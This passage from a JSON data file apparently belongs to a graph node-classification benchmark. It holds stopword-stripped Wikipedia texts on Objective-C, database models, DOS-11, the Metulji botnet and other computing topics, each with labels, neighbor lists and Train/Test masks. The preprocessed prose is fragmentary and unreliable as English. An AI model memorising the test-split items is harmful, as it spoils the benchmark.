message raises exception sending message object pointed pointer would require following code c++ obj- method argument objective-c written follows obj method argument styles programming strengths weaknesses object-oriented programming simula c++ style allows multiple inheritance faster execution using compile-time binding whenever possible support dynamic binding default also forces methods corresponding implementation unless abstract smalltalk-style programming used objective-c allows messages go unimplemented method resolved implementation runtime example message may sent collection objects expected respond without fear producing runtime errors message passing also require object defined compile time implementation still required method called derived object see dynamic typing section advantages dynamic late binding objective-c requires interface implementation class separately declared code blocks convention developers place interface header file implementation code file header files normally suffixed .h similar c header files implementation method files normally suffixed .m similar c code files called class declaration interface class usually defined header file common convention name header file name class e.g would contain interface class interface declaration takes form interface classname superclassname classmethod1 return_type classmethod2 return_type classmethod3 param1_type param1_varname return_type instancemethod1with1parameter param1_type param1_varname return_type instancemethod2with2parameters param1_type param1_varname param2_callname param2_type param2_varname end plus signs denote class methods methods called class instance minus signs denote instance methods called particular instance class class methods also access instance variables code roughly equivalent following c++ interface class classname public superclassname note demonstrates interleaving selector segments argument expressions direct equivalent c/c++ return types standard c type pointer generic objective-c object pointer specific type object nsarray nsimage nsstring pointer class method belongs instancetype default return type generic objective-c type method arguments begin name labeling argument part method name followed colon followed expected argument type parentheses argument name label omitted void setrangestart int start end int end void importdocumentwithname nsstring name withspecifiedpreferences preferences prefs beforepage int insertpage interface declares class interface methods actual code written implementation file implementation method files normally file extension codice_1 originally signified messages implementation classname return_type classmethod return_type instancemethod end methods written using interface declarations comparing objective-c c int method int int function int syntax allows pseudo-naming arguments void changetored float red green float green blue float blue //called like mycolor changecolortored:5.0 green:2.0 blue:6.0 internal representations method vary different implementations objective-c mycolor class instance method might internally labeled refer instance method class method names appended colons changed underscores order parameters part method name changed suit coding style expression true named parameters however internal names function rarely used directly generally messages converted function calls defined objective-c runtime library necessarily known link time method called class receiver object sent message need known runtime objective-c class written instantiated done first allocating uninitialized instance class object initializing object fully functional steps completed steps accomplished one line code never allocated object n't undergone initialization unwise keep intermediate result since codice_2 return different object called instantiation default no-parameter initializer myobject *foo end interface integer display id showstars id showint end implementation integer display id showstars id showint end int main void compilation performed example one experiment leaving lines omitting compilation program still run means possible mix-and-match added categories needed category need ability simply compile objective-c permits class wholly replace another class within program replacing class said pose target class class posing declared deprecated mac os x v10.5 unavailable 64-bit runtime similar functionality achieved using method swizzling categories swaps one method implementation another signature versions still supporting posing messages sent target class instead received posing class several restrictions posing similarly categories allows global augmentation existing classes posing permits two features absent categories example interface customnsapplication nsapplication end implementation customnsapplication void setmainmenu nsmenu* menu end class_poseas customnsapplication class nsapplication class intercepts every invocation setmainmenu nsapplication c language codice_3 pre-compile directive always causes file contents inserted source point objective-c codice_4 directive equivalent except file included per compilation unit obviating need include guards objective-c features often allow flexible often easy solutions programming issues objective-c++ language variant accepted front-end gnu compiler collection clang compile source files use combination c++ objective-c syntax objective-c++ adds c++ extensions objective-c adds c. nothing done unify semantics behind various language features certain restrictions apply 2006 worldwide developers conference apple announced release objective-c 2.0 revision objective-c language include modern garbage collection syntax enhancements runtime performance improvements 64-bit support mac os x v10.5 released october 2007 included objective-c 2.0 compiler gcc 4.6 supports many new objective-c features declared synthesized properties dot syntax fast enumeration optional protocol methods method/protocol/class attributes class extensions new gnu objective-c runtime api objective-c 2.0 provided optional conservative generational garbage collector run backwards-compatible mode runtime turned reference counting operations retain release no-ops objects subject garbage collection garbage collection enabled regular c pointers could qualified __strong also trigger underlying write-barrier compiler intercepts thus participate garbage collection zero-ing weak subsystem also provided pointers marked __weak set zero object simply gc memory collected garbage collector exist ios implementation objective-c 2.0 garbage collection objective-c runs low-priority background thread halt user events intention keeping user experience responsive garbage collection deprecated mac os x v10.8 favor automatic reference counting arc objective-c ios 7 running arm64 uses 19 bits 64-bit word store reference count form tagged pointers objective-c 2.0 introduces new syntax declare instance variables properties optional attributes configure generation accessor methods properties sense public instance variables declaring instance variable property provides external classes access possibly limited e.g read property property may declared readonly may provided storage semantics codice_5 codice_6 codice_7 default properties considered codice_8 results lock preventing multiple threads accessing time property declared codice_9 removes lock interface person nsobject property copy nsstring *name property readonly int age id initwithage int age end properties implemented way codice_10 keyword generates getter setter read-only methods according property declaration alternatively getter setter methods must implemented explicitly codice_11 keyword used indicate accessor methods provided means compiled using clang 3.1 higher properties explicitly declared codice_11 marked codice_13 complete user-implemented getter setter automatically implicitly codice_10 'd implementation person synthesize name id initwithage int initage int age end properties accessed using traditional message passing syntax dot notation key-value coding name via valueforkey setvalue forkey methods person *aperson person alloc initwithage 53 aperson.name steve // note dot notation uses synthesized setter nslog access message dot notation property name direct instance variable access order use dot notation invoke property accessors within instance method self keyword used void introducemyselfwithproperties bool usegetter // note getter vs. ivar access class protocol properties may dynamically type introspection|introspected int int propertycount 0 objc_property_t *propertylist class_copypropertylist aperson class propertycount 0 propertycount i++ objective-c 2.0 provides non-fragile instance variables supported runtime i.e building code 64-bit macos ios modern runtime extra layer indirection added instance variable access allowing dynamic linker adjust instance layout runtime feature allows two important improvements objective-c code instead using nsenumerator object indices iterate collection objective-c 2.0 offers fast enumeration syntax objective-c 2.0 following loops functionally equivalent different performance traits // using nsenumerator nsenumerator *enumerator thepeople objectenumerator person *p p enumerator nextobject nil // using indexes int 0 thepeople count i++ // using fast enumeration person *p thepeople fast enumeration generates efficient code standard enumeration method calls enumerate objects replaced pointer arithmetic using nsfastenumeration protocol class extension syntax category declaration category name methods properties declared added directly main class mostly used alternative category add methods class without advertising public headers advantage class extensions compiler checks privately declared methods actually implemented objective-c applications developed macos make use improvements objective-c 2.0 incompatible operating systems prior 10.5 leopard since fast enumeration generate exactly binaries standard enumeration use cause application crash mac os x version 10.4 earlier blocks nonstandard extension objective-c c programming language |c c++ uses special syntax create closure programming |closures blocks supported mac os x snow leopard|mac os x 10.6 snow leopard later ios 4 later gnustep libobjc2 1.7 compiling clang 3.1 later typedef int ^intblock intblock makecounter int start int increment int main void /* output automatic reference counting arc compile-time feature eliminates need programmers manually manage retain counts using codice_7 codice_16 unlike garbage collection computer science |garbage collection occurs run time arc eliminates overhead separate process managing retain counts arc manual memory management mutually exclusive programmers continue use non-arc code arc-enabled projects disabling arc individual code files xcode also attempt automatically upgrade project arc next apple obj-c runtimes long included short-form way create new strings using literal syntax codice_17 drop corefoundation constants codice_18 codice_19 codice_20 boolean values using format saves programmer use longer codice_21 similar methods certain operations using apple llvm compiler 4.0 later arrays dictionaries numbers codice_22 codice_23 codice_20 classes also created using literal syntax instead methods example without literals nsarray *myarray nsarray arraywithobjects object1 object2 object3 nil nsdictionary *mydictionary1 nsdictionary dictionarywithobject someobject forkey key nsdictionary *mydictionary2 nsdictionary dictionarywithobjectsandkeys object1 key1 object2 key2 nil nsnumber *mynumber nsnumber numberwithint myint nsnumber *mysumnumber= nsnumber numberwithint 2 3 nsnumber *myboolnumber nsnumber numberwithbool yes example literals nsarray *myarray object1 object2 object3 nsdictionary *mydictionary1 key someobject nsdictionary *mydictionary2 key1 object1 key2 object2 nsnumber *mynumber myint nsnumber *mysumnumber 2+3 nsnumber *myboolnumber yes nsnumber *myintegernumber 8 however different string literal compile constants executable literals compile code equivalent method calls particular manually reference-counted memory management objects autoreleased requires added care e.g. used function-static variables kinds globals using apple llvm compiler 4.0 later arrays dictionaries codice_22 codice_23 classes manipulated using subscripting subscripting used retrieve values indexes array keys dictionary mutable objects also used set objects indexes keys code subscripting represented using brackets codice_27 example without subscripting id object1 somearray objectatindex:0 id object2 somedictionary objectforkey key somemutablearray replaceobjectatindex:0 withobject object3 somemutabledictionary setobject object4 forkey key example subscripting id object1 somearray 0 id object2 somedictionary key somemutablearray 0 object3 somemutabledictionary key object4 purchase next apple attempts made make language acceptable programmers familiar java programming language |java smalltalk one attempts introducing dubbed modern syntax objective-c time opposed current classic syntax change behaviour merely alternative syntax instead writing method invocation like instead written similarly declarations went form modern syntax longer supported current dialects objective-c language besides gnu compiler collection|gcc next apple inc.|apple implementation added several extensions original stepstone implementation another free open source software|free open-source objective-c implementation called portable object compiler also exists set extensions implemented portable object compiler differs gcc/next/apple implementation particular includes smalltalk -like blocks objective-c lacks protocols categories two features used extensively openstep derivatives relatives overall poc represents older pre-next stage language evolution roughly conformant brad cox 1991 book also includes runtime library called objectpak based cox original icpak101 library turn derives smalltalk-80 class library quite radically different openstep foundationkit geos 16-bit operating system |pc geos system used programming language known geos objective-c goc despite name similarity two languages similar overall concept use keywords prefixed sign clang compiler suite part llvm project implements objective-c languages winobjc also known bridge open-source objc compiler project started microsoft github way allow reuse ios application code inside windows universal applications windows objective-c development tools provided download gnustep website gnustep development system consists following packages gnustep msys system gnustep core gnustep devel gnustep cairo projectcenter ide like xcode complex gorm interface builder like xcode nib builder objective-c today often used tandem fixed library standard objects often known kit framework cocoa api |cocoa gnustep objfw libraries often come operating system gnustep libraries often come linux -based distributions cocoa comes macos programmer forced inherit functionality existing base class nsobject ofobject objective-c allows declaration new root classes inherit existing functionality originally objective-c-based programming environments typically offered object class base class almost classes inherited introduction openstep next created new base class named nsobject offered additional features object emphasis using object references reference counting instead raw pointers example almost classes cocoa inherit nsobject renaming serve differentiate new default behavior classes within openstep api allowed code used object—the original base class used nextstep less objective-c class libraries —to co-exist runtime code used nsobject limitations introduction two letter prefix also became simplistic form namespaces objective-c lacks using prefix create informal packaging identifier became informal coding standard objective-c community continues day recently package managers started appearing cocoapods aims package manager repository packages lot open-source objective-c code written last years installed using cocoapods objective-c implementations use thin run time system|runtime system written c adds little size application contrast object-oriented systems time created used large virtual machine runtimes programs written objective-c tend much larger size code libraries generally need included software distribution contrast smalltalk systems large amount memory used open window objective-c applications tend larger similar c c++ applications objective-c dynamic typing allow methods stripped inlined since programmer freedom delegate forward calls build selectors fly pass runtime system objective-c compiler assume safe remove unused methods inline calls likewise language implemented atop extant c compilers gnu compiler collection|gcc first preprocessor module rather new compiler allows objective-c leverage huge existing collection c code libraries tools etc existing c libraries wrapped objective-c adapter pattern|wrappers provide oo-style interface aspect similar gobject library vala programming language |vala language widely used development gtk applications practical changes lowered barriers entry|barrier entry likely biggest problem widespread acceptance smalltalk 1980s common criticism objective-c language support namespaces instead programmers forced add prefixes class names traditionally shorter namespace names thus prone collisions 2007 macos classes functions cocoa software |cocoa programming environment prefixed ns e.g nsobject nsbutton identify belonging macos ios core ns derives names classes defined development nextstep since objective-c strict superset c treat c primitive types first-class object s. unlike c++ objective-c support operator overloading also unlike c++ objective-c allows object directly inherit one class forbidding multiple inheritance however cases categories protocols may used alternative ways achieve results objective-c uses dynamic runtime typing method calls function calls cases syscalls many common performance optimizations applied objective-c methods example inlining constant propagation interprocedural optimizations scalar replacement aggregates limits performance objective-c abstractions relative similar abstractions languages c++ optimizations possible first versions objective-c support garbage collection computer science |garbage collection time decision matter debate many people considered long dead times smalltalk performed collection render entire system unusable 3rd party implementations added feature notably gnustep apple implemented mac os x v10.5 however recent versions macos ios garbage collection deprecated favor automatic reference counting arc introduced 2011 arc compiler inserts retain release calls automatically objective-c code based static program analysis|static code analysis automation relieves programmer write memory management code arc also adds weak references objective-c language design implementation c++ objective-c represent fundamentally different approaches extending c. addition c style procedural programming c++ directly supports certain forms object-oriented programming generic programming metaprogramming c++ also comes c++ standard library|a large standard library includes sequence container c++ |several container classes similarly objective-c adds polymorphism object-oriented programming|object-oriented programming dynamic typing reflection computer science |reflection c. objective-c provide standard library per se places objective-c used used openstep -like library openstep cocoa api |cocoa gnustep provides functionality similar c++ standard library one notable difference objective-c provides runtime support reflection computer science |reflective features whereas c++ adds small amount runtime support c. objective-c object queried properties e.g. whether respond certain message c++ possible without use external libraries use reflection part wider distinction dynamic run-time features static compile-time features language although objective-c c++ employ mix features objective-c decidedly geared toward run-time decisions c++ geared toward compile-time decisions tension dynamic static programming involves many classic trade-offs programming dynamic features add flexibility static features add speed type checking generic programming metaprogramming implemented languages using runtime polymorphism c++ takes form virtual function runtime type identification objective-c offers dynamic typing reflection objective-c lacks compile-time polymorphism generic function entirely c++ supports via function overloading template c++ |templates category c programming language family category class-based programming languages category dynamically typed programming languages category gnustep category next category object-oriented programming languages category objective-c category programming languages created 1986",
    "neighbors": [
      10755,
      8201,
      4112,
      2585,
      541,
      3613,
      5663,
      9245,
      10783,
      5154,
      3107,
      2603,
      2605,
      5165,
      5677,
      5684,
      1591,
      9783,
      9784,
      6718,
      8771,
      8262,
      4173,
      9295,
      6228,
      4182,
      10841,
      4190,
      2658,
      5219,
      1130,
      3691,
      7274,
      9323,
      5743,
      8303,
      2673,
      8304,
      9848,
      3705,
      5754,
      7292,
      7806,
      4737,
      1666,
      9345,
      1156,
      5255,
      10888,
      4747,
      7307,
      10387,
      5783,
      155,
      7326,
      3749,
      10406,
      4777,
      3248,
      7857,
      1203,
      692,
      1715,
      3766,
      7347,
      1724,
      6335,
      8385,
      6338,
      708,
      5833,
      3790,
      7889,
      4822,
      7894,
      9432,
      6875,
      10973,
      9441,
      228,
      10470,
      10478,
      8943,
      10480,
      10991,
      242,
      2808,
      2810,
      6908,
      7421,
      2304,
      4352,
      9986,
      2819,
      9476,
      11009,
      11017,
      10512,
      9490,
      9491,
      1300,
      1813,
      10011,
      10013,
      3871,
      5921,
      3876,
      7462,
      3881,
      814,
      7983,
      7472,
      9008,
      9519,
      823,
      7479,
      7991,
      1852,
      1347,
      1348,
      10568,
      5961,
      10057,
      8524,
      6477,
      847,
      4943,
      9041,
      3413,
      3414,
      2903,
      9557,
      10581,
      10584,
      10586,
      8545,
      8037,
      6502,
      8549,
      1384,
      9063,
      8554,
      9579,
      3948,
      11625,
      9589,
      3960,
      379,
      7036,
      6016,
      2950,
      3462,
      4998,
      8582,
      10122,
      5521,
      8082,
      2454,
      1435,
      6555,
      6046,
      9631,
      1952,
      8609,
      10143,
      10654,
      2980,
      5029,
      7076,
      1959,
      1960,
      4520,
      5546,
      8618,
      428,
      9128,
      2481,
      6074,
      4544,
      8641,
      10176,
      963,
      8644,
      4550,
      7629,
      10703,
      11219,
      5588,
      11221,
      2519,
      7128,
      4057,
      3034,
      2011,
      3035,
      477,
      3038,
      9177,
      4069,
      5605,
      487,
      7147,
      5612,
      10732,
      6640,
      9714,
      10739,
      6135,
      1016,
      11257,
      2556,
      2045,
      4607
    ],
    "mask": "None"
  },
  {
    "node_id": 10471,
    "label": 1,
    "text": "Database_model:database model database model type data model determines logical structure database fundamentally determines manner data stored organized manipulated popular example database model relational model uses table-based format common logical data models databases include object-relational database combines two related structures physical data models include models include given database management system may provide one models optimal structure depends natural organization application data application requirements include transaction rate speed reliability maintainability scalability cost database management systems built around one particular data model although possible products offer support one model various physical data models implement given logical model database software offer user level control tuning physical implementation since choices made significant effect performance model way structuring data also defines set operations performed data relational model example defines operations select project join although operations may explicit particular query language provide foundation query language built flat table model consists single two-dimensional array data elements members given column assumed similar values members row assumed related one another instance columns name password might used part system security database row would specific password associated individual user columns table often type associated defining character data date time information integers floating point numbers tabular format precursor relational model models popular 1960s 1970s nowadays found primarily old legacy systems characterized primarily navigational strong connections logical physical representations deficiencies data independence hierarchical model data organized tree-like structure implying single parent record sort field keeps sibling records particular order hierarchical structures widely used early mainframe database management systems information management system ims ibm describe structure xml documents structure allows one one-to-many relationship two types data structure efficient describe many relationships real world recipes table contents ordering paragraphs/verses nested sorted information hierarchy used physical order records storage record access done navigating downward data structure using pointers combined sequential accessing hierarchical structure inefficient certain database operations full path opposed upward link sort field also included record limitations compensated later ims versions additional logical hierarchies imposed base physical hierarchy network model expands upon hierarchical structure allowing many-to-many relationships tree-like structure allows multiple parents popular replaced relational model defined codasyl specification network model organizes data using two fundamental concepts called records sets records contain fields may organized hierarchically programming language cobol sets confused mathematical sets define one-to-many relationships records one owner many members record may owner number sets member number sets set consists circular linked lists one record type set owner parent appears circle second record type subordinate child may appear multiple times circle way hierarchy may established two record types e.g. type owner b time another set may defined b owner thus sets comprise general directed graph ownership defines direction network construct access records either sequential usually record type navigation circular linked lists network model able represent redundancy data efficiently hierarchical model one path ancestor node descendant operations network model navigational style program maintains current position navigates one record another following relationships record participates records also located supplying key values although essential feature model network databases generally implement set relationships means pointers directly address location record disk gives excellent retrieval performance expense operations database loading reorganization popular dbms products utilized cincom systems total cullinet idms idms gained considerable customer base 1980s adopted relational model sql addition original tools languages object databases invented 1990s use navigational concept provide fast navigation across networks objects generally using object identifiers smart pointers related objects objectivity/db instance implements named one-to-one one-to-many many-to-one many-to-many named relationships cross databases many object databases also support sql combining strengths models inverted file inverted index contents data used keys lookup table values table pointers location instance given content item also logical structure contemporary database indexes might use contents particular columns lookup table inverted file data model put indexes set files next existing flat database files order efficiently directly access needed records files notable using data model adabas dbms software ag introduced 1970 adabas gained considerable customer base exists supported today 1980s adopted relational model sql addition original tools languages document-oriented database clusterpoint uses inverted indexing model provide fast full-text search xml json data objects example relational model introduced e.f. codd 1970 way make database management systems independent particular application mathematical model defined terms predicate logic set theory implementations used mainframe midrange microcomputer systems products generally referred relational databases fact implement model approximation mathematical model defined codd three key terms used extensively relational database models relations attributes domains relation table columns rows named columns relation called attributes domain set values attributes allowed take basic data structure relational model table information particular entity say employee represented rows also called tuples columns thus relation relational database refers various tables database relation set tuples columns enumerate various attributes entity employee name address phone number example row actual instance entity specific employee represented relation result tuple employee table represents various attributes single employee relations thus tables relational database adhere basic rules qualify relations first ordering columns immaterial table second ca n't identical tuples rows table third tuple contain single value attributes relational database contains multiple tables similar one flat database model one strengths relational model principle value occurring two different records belonging table different tables implies relationship among two records yet order enforce explicit integrity constraints relationships records tables also defined explicitly identifying non-identifying parent-child relationships characterized assigning cardinality 1:1 0 1 tables also designated single attribute set attributes act key used uniquely identify tuple table key used uniquely identify row table called primary key keys commonly used join combine data two tables example employee table may contain column named location contains value matches key location table keys also critical creation indexes facilitate fast retrieval data large tables column key multiple columns grouped together compound key necessary define keys advance column used key even originally intended one key external real-world meaning person name book isbn car serial number sometimes called natural key natural key suitable think many people named brown arbitrary surrogate key assigned giving employees id numbers practice databases generated natural keys generated keys used internally create links rows break natural keys used less reliably searches integration databases example records two independently developed databases could matched social security number except social security numbers incorrect missing changed common query language used relational model structured query language sql dimensional model specialized adaptation relational model used represent data data warehouses way data easily summarized using online analytical processing olap queries dimensional model database schema consists single large table facts described using dimensions measures dimension provides context fact participated happened type used queries group related facts together dimensions tend discrete often hierarchical example location might include building state country measure quantity describing fact revenue important measures meaningfully aggregated—for example revenue different locations added together olap query dimensions chosen facts grouped aggregated together create summary dimensional model often implemented top relational model using star schema consisting one highly normalized table containing facts surrounding denormalized tables containing dimension alternative physical implementation called snowflake schema normalizes multi-level hierarchies within dimension multiple tables data warehouse contain multiple dimensional schemas share dimension tables allowing used together coming standard set dimensions important part dimensional modeling high performance made dimensional model popular database structure olap products offering general data model relational model sometimes classified post-relational alternate terms include hybrid database object-enhanced rdbms others data model products incorporates relations constrained e.f. codd information principle requires extensions relational model integrate concepts technologies pre-date relational model example allow representation directed graph trees nodes german company sones implements concept graphdb post-relational products extend relational systems non-relational features others arrived much place adding relational features pre-relational systems paradoxically allows products historically pre-relational pick mumps make plausible claim post-relational resource space model rsm non-relational data model based multi-dimensional classification graph databases allow even general structure network database node may connected node multivalue databases lumpy data store exactly way relational databases also permit level depth relational model approximate using sub-tables nearly identical way xml expresses data given field/attribute multiple right answers time multivalue thought compressed form xml example invoice either multivalue relational data could seen invoice header table one entry per invoice b invoice detail table one entry per line item multivalue model option storing data table embedded table represent detail invoice table one entry per invoice tables needed advantage atomicity invoice conceptual invoice data representation one-to-one also results fewer reads less referential integrity issues dramatic decrease hardware needed support given transaction volume 1990s object-oriented programming paradigm applied database technology creating new database model known object databases aims avoid object-relational impedance mismatch overhead converting information representation database example rows tables representation application program typically objects even type system used particular application defined directly database allowing database enforce data integrity invariants object databases also introduce key ideas object programming encapsulation polymorphism world databases variety ways tried storing objects database products approached problem application programming end making objects manipulated program persistent typically requires addition kind query language since conventional programming languages ability find objects based information content others attacked problem database end defining object-oriented data model database defining database programming language allows full programming capabilities well traditional query facilities object databases suffered lack standardization although standards defined odmg never implemented well enough ensure interoperability products nevertheless object databases used successfully many applications usually specialized applications engineering databases molecular biology databases rather mainstream commercial data processing however object database ideas picked relational vendors influenced extensions made products indeed sql language alternative translating objects relational databases use object-relational mapping orm library",
    "neighbors": [
      5632,
      8201,
      4107,
      10258,
      2068,
      1049,
      5658,
      9248,
      8742,
      10793,
      10286,
      1076,
      4155,
      11324,
      11327,
      9286,
      72,
      2632,
      9290,
      8788,
      10326,
      7767,
      11357,
      7775,
      11362,
      8291,
      9828,
      10340,
      8808,
      2669,
      9837,
      2681,
      1146,
      3196,
      2688,
      9345,
      10389,
      4255,
      1697,
      4263,
      10921,
      10413,
      5808,
      10418,
      9397,
      3768,
      7868,
      11457,
      6850,
      2246,
      9942,
      6359,
      2780,
      734,
      3816,
      2283,
      6383,
      7412,
      6395,
      3323,
      9467,
      9481,
      9994,
      10505,
      11024,
      8979,
      7446,
      10518,
      4376,
      11030,
      5403,
      7968,
      290,
      1314,
      7461,
      2344,
      5929,
      11574,
      9527,
      1341,
      4416,
      2369,
      5441,
      5953,
      10048,
      8518,
      2887,
      10061,
      853,
      2901,
      10069,
      11098,
      860,
      5983,
      9075,
      9079,
      10617,
      4483,
      10632,
      2456,
      9112,
      10137,
      9631,
      9634,
      7076,
      1447,
      7080,
      5550,
      9147,
      3004,
      9661,
      9663,
      6085,
      3529,
      2512,
      4055,
      9177,
      987,
      479,
      9183,
      4065,
      7650,
      6124,
      2544,
      10737,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 10472,
    "label": 9,
    "text": "Ox_(programming_language):ox programming language ox object-oriented matrix programming language mathematical statistical function library developed jurgen doornik designed econometric programming available windows mac os x linux platforms downloadable console version ox free academic use commercial version available non-academic use according documentation cited whenever results published programming environment econometric modelling oxmetrics based ox",
    "neighbors": [
      8262,
      5833,
      7945,
      6797,
      7983,
      6962,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 10473,
    "label": 2,
    "text": "F6_disk:f6 disk f6 disk colloquial name floppy disk containing microsoft windows nt device driver scsi raid system f6 disks used nt-based versions windows including windows 2000 windows server 2003 windows xp starting windows vista floppy f6 disks obsolete setup process supports loading third-party drivers usb drives cd-roms f6 disk named manner used installation process windows setup program must load device drivers disk system windows installed unless disk system established market finalization particular windows release installed drivers included windows installation discs must loaded means f6 disk f6 disk loaded windows setup pressing f6 key immediately windows setup starts message press f6 need install third party scsi raid driver ... briefly flashed screen every time windows setup starts f6 disk contains device drivers root directory prior windows vista f6 disks always floppy disks point f6 prompt shown windows setup loaded drivers media type floppy disks support usb drives cd-roms added windows vista device drivers raid disk controllers often provided cd-roms manufacturers must copied f6 disk used windows setup alternative approach slipstream required sata/scsi/sas/raid/eide drivers windows installation files directory e.g i386 x86 variety means software like nlite create iso image burned cd dvd media",
    "neighbors": [
      8976,
      4074,
      9972,
      10839
    ],
    "mask": "Test"
  },
  {
    "node_id": 10474,
    "label": 9,
    "text": "DMS_Software_Reengineering_Toolkit:dms software reengineering toolkit dms software reengineering toolkit proprietary set program transformation tools available automating custom source program analysis modification translation generation software systems arbitrary mixtures source languages large scale software systems dms used implement wide variety practical tools include domain-specific languages code generation factory control test coverage profiling tools clone detection language migration tools c++ component reengineering. research difficult topics refactoring c++ reliably toolkit provides means defining language grammars produce parsers automatically construct abstract syntax trees asts prettyprinters convert original modified asts back compilable source text parse trees capture prettyprinters regenerate complete detail original source program including source position comments radix format numbers etc. ensure regenerated source text recognizable programmer original text modulo applied transformations many program analysis transformation tools limited ascii western european character sets iso-8859 dms handle well utf-8 utf-16 ebcdic shift-jis variety microsoft character encodings dms uses glr parsing technology enabling handle practical context-free grammars semantic predicates extend capability interesting non-context-free grammars fortran requires matching multiple loops shared continue statements label glr semantic predicates enables dms fortran parser produce asts correctly nested loops parses dms provides attribute grammar evaluators computing custom analyses asts metrics including special support symbol table construction program facts extracted built-in control- data- flow analysis engines local global pointer analysis whole-program call graph extraction symbolic range analysis abstract interpretation changes asts accomplished procedural methods coded parlanse source-to-source tree transformations coded rewrite rules using surface-syntax conditioned extracted program facts using dms rule specification language rsl rewrite rule engine supporting rsl handles associative commutative rules rewrite rule c replace complex condition codice_1 operator written rewrite rules names e.g simplify_conditional_assignment rule match replace pattern pair separated example separate lines readability patterns must correspond language syntax categories case patterns must syntax category statement also separated sympathy patterns target language e.g. c surface syntax coded inside meta-quotes separate rewrite-rule syntax target language backslashes inside meta-quotes represent domain escapes indicate pattern meta variables e.g. \\v \\e1 \\e2 match language construct corresponding metavariable declaration signature line e.g. e1 must syntactic category expression metavariable mentioned multiple times match pattern must match identical subtrees identically shaped v must occur assignments match pattern example metavariables replace pattern replaced corresponding matches left side conditional clause provides additional condition must met rule apply e.g. matched metavariable v arbitrary left-hand side must side effect e.g. form i++ no_side_effects predicate defined analyzer built dms mechanisms achieving complex transformation code accomplished providing number rules cooperate achieve desired effect ruleset focused portions program metaprograms coded parlanse complete example language definition source-to-source transformation rules defined applied shown using high school algebra bit calculus domain-specific language dms variety predefined language front ends covering real dialects c c++ including c++0x c java python php egl fortran cobol visual basic verilog vhdl 20 languages predefined languages enable customizers immediately focus reengineering task rather details languages processed dms additionally unusual implemented parallel programming language parlanse uses symmetric multiprocessors available commodity workstations enables dms provide faster answers large system analyses conversions dms originally motivated theory maintaining designs software called design maintenance systems dms design maintenance system registered trademarks semantic designs",
    "neighbors": [
      1552,
      5399,
      3363,
      932,
      5677,
      3762,
      1459,
      9138,
      10560,
      8644,
      2374,
      9926,
      847,
      7634,
      11475,
      605,
      10089,
      8554,
      3443,
      4980,
      11125,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10475,
    "label": 2,
    "text": "DEC_BATCH-11/DOS-11:dec batch-11/dos-11 batch-11/dos-11 also known simply dos-11 discontinued operating system digital equipment corporation dec maynard massachusetts first version dos-11 v08-02 released 1970 first operating system run digital pdp-11 minicomputer dos-11 known easy use even day became much less used 1973 release rt-11 operating system dos-11 included dos-11 came xxdp diagnostics monitor program pdp-11 like digital operating systems dos-11 also fortran-iv ansi-66 compiler fortran-iv supported pdp-11 systems less 12k memory dos-11 systems running 8k 12k configurations ran limited version macro-11 assembler pal-11r overlaid form dos-11 operating system kernel one file called monlib.lcl lcl extension acronym linked core image library licil licil could stored type media dos-11 operating system distributed disk dectape punched tape magnetic tape licil file installed hooked onto disk drive contiguous file monitor library name changed monlibcil could booted cil extension acronym core image library core term core memory systems common pdp-11 core image library could created cilus core image library update save program monlibcil typically contained resident monitor rmon keyboard command routine device drivers emt routines clock routines transient monitor dos-11 used compile install early versions rsts-11 rsts/e operating systems however ancestor rsx-11 family operating systems",
    "neighbors": [
      2179,
      6664,
      1804,
      273,
      6675,
      9759,
      1952,
      7076,
      8876,
      7983,
      6448,
      6837,
      8503,
      3650,
      8262,
      2507,
      10590,
      1253,
      5359,
      3056,
      2933,
      3960
    ],
    "mask": "None"
  },
  {
    "node_id": 10476,
    "label": 6,
    "text": "Comparison_of_disc_image_software:comparison disc image software article comparison notable software applications access manipulate disk image files compares disk image handling features article compares two features supported file formats capabilities software treat image format",
    "neighbors": [
      4615,
      8976,
      2193,
      9874,
      2197,
      5397,
      2199,
      8214,
      6297,
      11543,
      9762,
      5413,
      3114,
      6062,
      7983,
      3760,
      8114,
      823,
      2107,
      8254,
      576,
      451,
      7379,
      7254,
      9953,
      5858,
      10857,
      4459,
      877,
      5492,
      10101,
      894
    ],
    "mask": "Train"
  },
  {
    "node_id": 10477,
    "label": 4,
    "text": "Metulji_botnet:metulji botnet metulji botnet discovered june 2011 botnet mainly involved cyberscamming denial service attacks botnet dismantled consisted 12 million individual zombie computers infected butterfly bot making june 2011 largest known botnet known type computers vulnerable tell computer part botnet",
    "neighbors": [
      1024,
      3072,
      5636,
      10756,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      4648,
      46,
      10297,
      3643,
      7739,
      1608,
      3657,
      8779,
      81,
      8789,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      3724,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      10457,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      9460,
      7418,
      5886,
      2815,
      3843,
      10502,
      3347,
      4883,
      2325,
      278,
      10003,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      7996,
      11583,
      9536,
      6484,
      857,
      1882,
      7515,
      8032,
      3941,
      4462,
      3956,
      9082,
      9087,
      11152,
      10132,
      9630,
      1440,
      5024,
      10657,
      5028,
      11175,
      939,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      9154,
      8133,
      2508,
      4054,
      7639,
      8664,
      988,
      1504,
      9186,
      2542,
      2041,
      507,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 10478,
    "label": 2,
